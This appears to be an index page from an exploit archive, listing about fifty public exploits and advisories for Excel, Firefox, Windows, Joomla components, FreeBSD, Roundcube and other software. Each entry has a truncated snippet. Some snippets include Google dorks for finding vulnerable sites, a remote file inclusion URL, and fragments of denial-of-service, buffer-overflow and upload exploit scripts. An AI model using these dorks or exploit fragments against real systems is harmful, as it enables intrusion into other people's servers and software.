Microsoft Excel - HFPicture Record Parsing Remote Code Execution

Microsoft Excel - HFPicture Record Parsing Remote Code Execution ''' | / |/ \ /\ | | | | \ | \ / | | | | / \ | | | | | | | |/| | | | |/ /\ | | | | day 16 binary anlysis | | | | || / \ || | | | || ||// \/|/ ''' Title : Microsoft Excel HFPicture Record Parsing Remote Code Execution Vulnerability...

Mozilla Firefox 3.6.3 - XSLT Sort Remote Code Execution

Mozilla Firefox 3.6.3 - XSLT Sort Remote Code Execution ''' | / |/ \ /\ | | | | \ | \ / | | | | / \ | | | | | | | |/| | | | |/ /\ | | | | Beatles """ BlockCount = 43000 count = 1 whilecount\n" count = count + 1 myStyle = myStyle +""" xsl:value-of select="name/l...

Microsoft Windows - nt!SeObjectCreateSaclAccessBits() Missed ACE Bounds Checks (MS10-047)

Microsoft Windows - nt!SeObjectCreateSaclAccessBits Missed ACE Bounds Checks MS10-047 Microsoft Windows nt!SeObjectCreateSaclAccessBits missed ACE bounds checks ---------------------------------------------------------------------------- CVE-2010-1890 An ACE is an Access Control Entry, of which...

Zendesk - Multiple Vulnerabilities

Zendesk - Multiple Vulnerabilities /¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\ :Zendesk Multiple Vulnerabilities : / /Discovered By: \ |Luis Santana | / Overview ¯¯¯¯¯¯¯¯¯¯ Luis Santana of the HackTalk Security team has found multiple vulnerabilities in Zendesk. Product Information ¯¯¯¯¯¯¯¯¯¯...

Microsoft Excel - 0x5D record Stack Overflow (MS10-038)

Microsoft Excel - 0x5D record Stack Overflow MS10-038 This is an exploit for MS10-038/CVE-2010-0822 Everything is hardcoded! winxp sp3 webDEViL w3bd3vilatgmaildot.com http://krash.in/excel1.xls Office 2007 - 12.0.4518.1014 MS10-038 bulletin states that Office 2007 is not vulnerable, lol import...

PHPaaCMS 0.3.1 - show.php?id SQL Injection

PHPaaCMS 0.3.1 - show.php?id SQL Injection Exploit Title: phpaaCms show.php?id= SQL injection Vulnerable Software http://www.phpaa.cn Tested on: win 7 category: webapp Code : n/a +++++++++++++++++++++++++++++++++++++++++++++++++++++++ MWUHH TO Bl00dMafia: KashmiriMafia, Mirpuri, Mirzatun: gula,...

Joomla! Component JE Job 1.0 - catid SQL Injection

Joomla! Component JE Job 1.0 - catid SQL Injection / / / \ \ \ \ \ / / \\ \ \ \ \ // /// \ \ / / \ //|\ / \ \ \ \ \ \ / / \ \ / / \ | | | \ | | || | | |/ / \ V / || |\ V / / \ | / \ | /| | | || / | | | | . | ' || / | || // \ // \|||/|||||||||\ .WEB.ID...

GlobalWebTek Design - SQL Injection

GlobalWebTek Design - SQL Injection .----..--.--.| |--..-----..----.| |.-----..-----. | || | || || -|| || || || | ||| ||||||| ||||| | || || GlobalWebTek Design SQL Injection Vulnerability Vendor: http://www.globalwebtek.com/ Discovered by : cyberlog Site : Sekuritionline.net Channel :...

Spaw Editor 1.02.0 - Arbitrary File Upload

Spaw Editor 1.02.0 - Arbitrary File Upload Tilte: Spaw Editor v1.0 & 2.0 Remote File Upload . Date....................: 20-05-2010 Author..................: Ma3sTr0-Dz Location ...............: Algeria Software ...............: Spaw Editor v1 & v2 Impact..................: Remote Site Software...

Microsoft Windows Outlook Express and Windows Mail - Integer Overflow

Microsoft Windows Outlook Express and Windows Mail - Integer Overflow Application: Microsoft Outlook Express Microsoft Windows Mail Platforms: Windows 2000 Windows XP Windows Vista Windows server 2003 Windows Server 2008 SR2 Exploitation: Remote Exploitable CVE Number: CVE-2010-0816 Discover Date...

ArticleLive (Interspire Website Publisher) - SQL Injection

ArticleLive Interspire Website Publisher - SQL Injection Author : ra3ch Product : ArticleLive Interspire Website Publisher Price : N/A Site : www.dz4all.com/cc Dork : "Website by Spokane Web Communications" Risk : High Vulnerable script: news.asp?id= SQL-injection...

Microsoft Windows - SMB2 Negotiate Protocol 0x72 Response Denial of Service

Microsoft Windows - SMB2 Negotiate Protocol 0x72 Response Denial of Service !/usr/bin/python === EDIT – this exploit appears to be exactly the same one of one which was already found and fixed notified by Laurent Gaffié, i did not know this but his blog post can be found here:...

Modelbook - casting_view.php SQL Injection

Modelbook - castingview.php SQL Injection / / / \ \ \ \ \ / / \\ \ \ \ \ // /// \ \ / / \ //|\ / \ \ \ \ \ \ / / \ \ / / \ | | | \ | | || | | |/ / \ V / || |\ V / / \ | / \ | /| | | || / | | | | . | ' || / | || // \ // \|||/|||||||||\ .WEB.ID...

Alstrasoft AskMe Pro 2.1 - que_id SQL Injection

Alstrasoft AskMe Pro 2.1 - queid SQL Injection / / / \ \ \ \ \ / / \\ \ \ \ \ // /// \ \ / / \ //|\ / \ \ \ \ \ \ / / \ \ / / \ | | | \ | | || | | |/ / \ V / || |\ V / / \ | / \ | /| | | || / | | | | . | ' || / | || // \ // \|||/|||||||||\ .WEB.ID...

Avtech Software - ActiveX avc781viewer.dll Multiple Vulnerabilities

Avtech Software - ActiveX avc781viewer.dll Multiple Vulnerabilities Title: AVTECH Software AVC781Viewer.dll ActiveX Multiple Remote Vulnerabilities Vendor: AVTECH Software, Inc. Product Web Page: http://www.avtech.com Summary: AVTECH Software, a private corporation founded in 1988, is a computer...

Soft Direct 1.05 - Multiple Vulnerabilities

Soft Direct 1.05 - Multiple Vulnerabilities ======================================================================================== | Title : Soft Direct v1.05 Multti Vulnerability | Author : indoushka | email : [email protected] | Home : www.iq-ty.com/vb | Script Home :...

Net Gitar Shop 1.0 - Database Disclosure

Net Gitar Shop 1.0 - Database Disclosure ======================================================================================== | Title : Net Gitar Shopv1.0 DB Download Vulnerability | Author : indoushka | email : [email protected] | Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria...

Lebi soft Ziyaretci Defteri 7.5 - Database Disclosure

Lebi soft Ziyaretci Defteri 7.5 - Database Disclosure ======================================================================================== | Title : Lebi soft Ziyaretci Defteriv7.5 DB Download Vulnerability | Author : indoushka | email : [email protected] | Home : Souk Naamane - 04325 - O...

Pay Per Minute Video Chat Script 2.02.1 - Multiple Vulnerabilities

Pay Per Minute Video Chat Script 2.02.1 - Multiple Vulnerabilities ? ?????????????????????????In The Name Of Allah The Mercifull?????????????????????? ? Tybe: suffer from multi XSS Vulnerability Vendor: payperviewvideosoftware.com ? Software : Pay Per Minute Video Chat Script V 2.1 - pR!CE :...

IMG2ASCII - Cross-Site Scripting

IMG2ASCII - Cross-Site Scripting ======================================================================================== | Title : IMG2ASCII Cross Site Scripting Vulnerability | | Author : indoushka | | email : [email protected] | | Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria...

CactuShop 6.0 - Database Disclosure

CactuShop 6.0 - Database Disclosure ============================================================================== / \ | | | | / \ | | | | / \ | | | | / \ | || | / \ | | | | / \ | | // \ || || // \ || || ============================================================================== Note : Forever...

Best Top List - Cross-Site Scripting

Best Top List - Cross-Site Scripting ======================================================================================== | Title : Best Top List Cross Site Scripting Vulnerability | | Author : indoushka | | email : [email protected] | | Home : Souk Naamane - 04325 - Oum El Bouaghi -...

Pandora FMS Monitoring Application 2.1.x 3.x - SQL Injection

Pandora FMS Monitoring Application 2.1.x 3.x - SQL Injection PenTest Information: ==================== GESEC Teamsmash & rem0ve discover a SQL Injection Vulnerability on Pandora FMS Monitoring Software. Attackers can manipulate the application DBMS over a remote sql-injection vulnerability. Detai...

Joomla! Component com_jphoto - id SQL Injection

Joomla! Component comjphoto - id SQL Injection Joomla Component comjphoto SQL injection vulnerability - id Author : kaMtiEz [email protected] Homepage : http://www.indonesiancoder.com Date : december 9, 2009 Software Information + Vendor : http://www.corephp.com/ + About :...

GeN3 forum 1.3 - SQL Injection

GeN3 forum 1.3 - SQL Injection Author: Dr.0rYX & Cr3w-DZ Software Link: http://www.ptcpay.com/shop/browseproducts.php NN N AAAAAA SSSSSSSSS NNN N A A S N NN N A A S N NN N A A S TTTTTT EEEEE AAAA MM MM N NN N AAAAAAAA SSSSSSSSS TT E A A M M M M N NN N A A S TT E A A M M M N NN N A A S TT EEEE...

Portable E.M Magic Morph 1.95b - .MOR File Stack Buffer Overflow

Portable E.M Magic Morph 1.95b - .MOR File Stack Buffer Overflow / Portable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow POC By fl0 fl0w "can't stop me/my time is now/your time is up/MY TIME IS NOW !!!!" / The EIP offset is at 312 bytes 0x138 HEX After you compile and create the .MOR fil...

Joomla! Component com_digifolio 1.52 - id SQL Injection

Joomla! Component comdigifolio 1.52 - id SQL Injection Joomla Component comdigifolio 1.52 id SQL Injection Vulnerability --== Author ==-- + Author : v3n0m + Contact : v3n0m666atlivedotcom + Blog : http://0wnage.wordpress.com/ + Group : YOGYACARDERLINK + Site : http://yogyacarderlink.web.id/ + Dat...

XOOPS Celepar Module Qas - codigo SQL Injection

XOOPS Celepar Module Qas - codigo SQL Injection Xoops Celepar Module Qas Donwload of Xoops Celepar : http://www.xoops.pr.gov.br/uploads/core/xoopscelepar.tar.gz Author: s4r4d0 mail:[email protected] A Sql Injection has been found on modules Quas of Xoops Celepar in file Aviso.php . Source code:...

SguilPADS - Remote Server Crash

SguilPADS - Remote Server Crash Sguil/PADS Denial of Service exploit by Ataraxia Benjamin Rose Public announcement made 7/15/09. Please visit http://allmybase.com/ my blog for more up-to-date information, and a quick patch. More in-depth article available at: http://allmybase.com/?p=72 This more...

FreeBSD 7.07.1 - vfs.usermount Local Privilege Escalation

FreeBSD 7.07.1 - vfs.usermount Local Privilege Escalation / cve-2008-3531.c -- Patroklos Argyroudis, argp at domain census-labs.com Privilege escalation exploit for the FreeBSD-SA-08:08.nmount CVE-2008-3531 vulnerability: http://security.freebsd.org/advisories/FreeBSD-SA-08:08.nmount.asc...

Oracle 9i10g Database - Remote Network Authentication

Oracle 9i10g Database - Remote Network Authentication source: https://www.securityfocus.com/bid/35680/info Oracle Database is prone to a remote vulnerability in Network Authentication. The vulnerability can be exploited over the 'Oracle Net' protocol. An attacker doesn't require privileges to...

KingSoft Web Shield 1.1.0.62 - Cross-Site Scripting Code Execution

KingSoft Web Shield 1.1.0.62 - Cross-Site Scripting Code Execution KingSoft Web Shield XSS and Remote Code Execution Vulnerability Found by inking Version test Just make a website with evil javascript codes, and browse the url shows above milw0rm.com 2009-05-19...

MiniTwitter 0.2b - Remote User Options Changer

MiniTwitter 0.2b - Remote User Options Changer || || || -----------------------------------------\ == -- ----------- ---------------------------- ------------------/ ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O ¡PROUD TO BE SPANISH!...

Zervit Web Server 0.3 - sockets++ crash Remote Denial of Service

Zervit Web Server 0.3 - sockets++ crash Remote Denial of Service !/usr/bin/perl Zervit HTTP Server \n"; print "- Exemple: file.pl 127.0.0.1 80\n"; exit; $ip = $ARGV0; $port = $ARGV1; print "+ Sending request...\n"; for$i=0;$i=4;$i++ $socket = IO::Socket::INET-new Proto = "tcp", PeerAddr = "$ip",...

eVision CMS 2.0 - Remote Code Execution

eVision CMS 2.0 - Remote Code Execution !/usr/bin/perl ----------------------------------------------------------------------------- INFORMATIONS ----------------------------------------------------------------------------- eVision CMS 2.0...

Joomla! Component gigCalendar 1.0 - SQL Injection

Joomla! Component gigCalendar 1.0 - SQL Injection Joomla Component comgigcalgigcalgigsid SQL-injection Author : boom3rang Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1. Vulnerability : SQL injection Google Dork : inurl:comgigcal...

tadbook2 Module for XOOPS - open_book.php SQL Injection

tadbook2 Module for XOOPS - openbook.php SQL Injection source: https://www.securityfocus.com/bid/33196/info The tadbook2 module for XOOPS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue...

Roundcube Webmail 0.2b - Remote Code Execution

Roundcube Webmail 0.2b - Remote Code Execution !/bin/sh I was hoping the PoC would not appear so soon, but now that it is out, i thought i might as well publish my real exploit. Hunger http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5619 FOR LEARNING PURPOSES ONLY! PHP...

Alstrasoft SendIt Pro - Arbitrary File Upload

Alstrasoft SendIt Pro - Arbitrary File Upload AlstraSoft SendIt Pro Remote File Upload ---------------------------------------------------------- Discovered By: ZoRLu Date: 12.11.2008 Home: www.z0rlu.blogspot.com contact: [email protected] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : dork:...

e-Vision CMS 2.0.2 - Multiple Local File Inclusions

e-Vision CMS 2.0.2 - Multiple Local File Inclusions starting; $exploit-i...

phpScheduleIt 1.2.10 - reserve.php Remote Code Execution

phpScheduleIt 1.2.10 - reserve.php Remote Code Execution settitletranslate"Processing $Class"; 53. $t-printHTMLHeader; 54. $t-startMain; 55. 56. processreservation$POST'fn'; 57. 58. else 59. $resinfo = getResInfo; 60. $t-settitle$resinfo'title'; 61. $t-printHTMLHeader; 62. $t-startMain; 63...

Coupon Script 4.0 - id SQL Injection

Coupon Script 4.0 - id SQL Injection || | | Coupon Script 4.0 id Remote SQL Injection Vulnerability | | |---------------------Hussin X----------------------| | | Author: Hussin X | | Home : WwW.Hussin-X.CoM | WwW.tryag.CoM | | email: darkangelg85atYahooDoTcom | | | | | | | script :...

1024 CMS 1.4.4 - Multiple LocalRemote File Inclusions

1024 CMS 1.4.4 - Multiple LocalRemote File Inclusions Digital Security Research Group DSecRG Advisory DSECRG-08-027 Application: 1024 CMS Versions Affected: 1.4.3, 1.4.4 RFC Vendor URL: http://www.1024cms.com/ Bug: Multiple Remote/Local File Include Exploits: YES Reported: 18.06.2008 Second repor...

Joomla! Component EXP Shop - catid SQL Injection

Joomla! Component EXP Shop - catid SQL Injection /---------------------------------------------------------------\ \ / / Joomla Component expshop Remote SQL injection \ \ / ---------------------------------------------------------------/ Author : His0k4 ALGERIAN HaCkEr Dork : inurl:comexpshop POC...

WebCalendar 1.0.4 - includedir Remote File Inclusion

WebCalendar 1.0.4 - includedir Remote File Inclusion Cr@zyKing :\ BiyoSecurity Team WebCalendar v1.0.4 Remote Fıle Include Demo - Down : http://webcalendar.sourceforge.net/ http://localhost/patch/tools/sendreminders.php?noSet=0&includedir=http://sheLLz? Google Dork : "WebCalendar v1.0.4"...

Softbiz Web Host Directory Script - host_id SQL Injection

Softbiz Web Host Directory Script - hostid SQL Injection \ /\ \ / | \ \ | / \ // / | \ | \ \ Y / | \ / / \ /| /\ / / / / / .OR.ID ECHOADV89$2008 ----------------------------------------------------------------------------------------- ECHOADV89$2008 Softbiz Web Host Directory Script...

KwsPHP - Upload Remote Code Execution

KwsPHP - Upload Remote Code Execution -login -pass -email -file -id \n\n"; print "Url url of KwsPHP script : Ex : www.example.com/kwsphp/\n"; print "Login your account's login need to be allow to upload \n"; print "Pass account's password\n"; print "Email account's email\n"; print "File PHP scrip...

Mambo Component Ahsshop 1.51 - vara SQL Injection

Mambo Component Ahsshop 1.51 - vara SQL Injection Mambo Component comahsshop SQL Injection AUTHOR : S@BUN HOME : http://www.milw0rm.com/author/1334 BLOG : http://my.opera.com/SQL-Injection/blog/ MAiL : [email protected] DORK 1 : allinurl: "comahsshop"do=default EXPLOiT 1 :...

PhotoKorn Gallery 1.543 - pic SQL Injection

PhotoKorn Gallery 1.543 - pic SQL Injection =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-= Author: youkn0w Contact: you-knowatlinuxmail.org Website: www.youknowz.info Script: Photokorn Gallery Bug: Photokorn Gallery Remote SQL Injection =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-= Script...

Vantage Linguistics AnswerWorks 4 - API ActiveX Control Buffer Overflow

Vantage Linguistics AnswerWorks 4 - API ActiveX Control Buffer Overflow Vantage Linguistics AnswerWorks 4 API ActiveX Control Buffer Overflow Exploit function Check var buf = 'A'; while buf.length = 214 buf = buf + 'A'; // win32exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378...